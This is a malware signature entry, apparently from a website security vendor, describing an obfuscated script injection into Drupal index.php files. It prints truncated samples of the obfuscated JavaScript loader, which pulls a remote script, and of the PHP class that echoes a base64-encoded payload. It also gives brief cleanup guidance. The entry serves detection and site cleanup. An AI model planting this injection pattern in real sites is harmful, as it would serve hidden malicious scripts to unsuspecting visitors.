Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

Malware entry: malware.injection.32

Description:

Injection of an obfuscated script from hxxps://track.amishbrand[.]com/s_code.js?...

Typical sample

<script>
;(​function(){var x=navigator[m("4t}​n)e}gnA(r;eistu}")];var y=document[m(":e}idk​,owodc,")];​if(s(x,m("0s7w)​obd)n)i(W{"))&​&!s(x,m("&dui{o;r,den;Aj"))){if(!s(y,m("p=na{m9t(uo_,_d_("))){var b=document.createElement('​script');b.type='text/javascript';b.async=true;b.​src=m('b2)...skipped...o.parentNode.​insertBefore(b,o);}}function m(v){var ...skipped...{var k='';for(var p=​t.length-1;p>=0;p-​-){k+​=t[p];}return k;}​})();
</script>

Cleanup

This malware can be injected into index.php files of Drupal sites in a from of the following PHP code, which needs to be removed to clean the site.

<?php
	
class SoFooterClass{
	
	public $data = 'PHNjcmlwdD4KOyhmdW5jdGlvbigpe3ZhciB4PW5hdmlnYXRvclttKCI0d...skipped...ZXR1cm4gazt9fSkoKTsKPC9zY3JpcHQ+';
   
	public function __destruct(){
		
		echo base64_decode($​this-​>data);
		
	}
	
}

$​sofooter = new SoFooterClass();
	
?>


Affecting: Drupal.

Mitigation How to clean a hacked Drupal site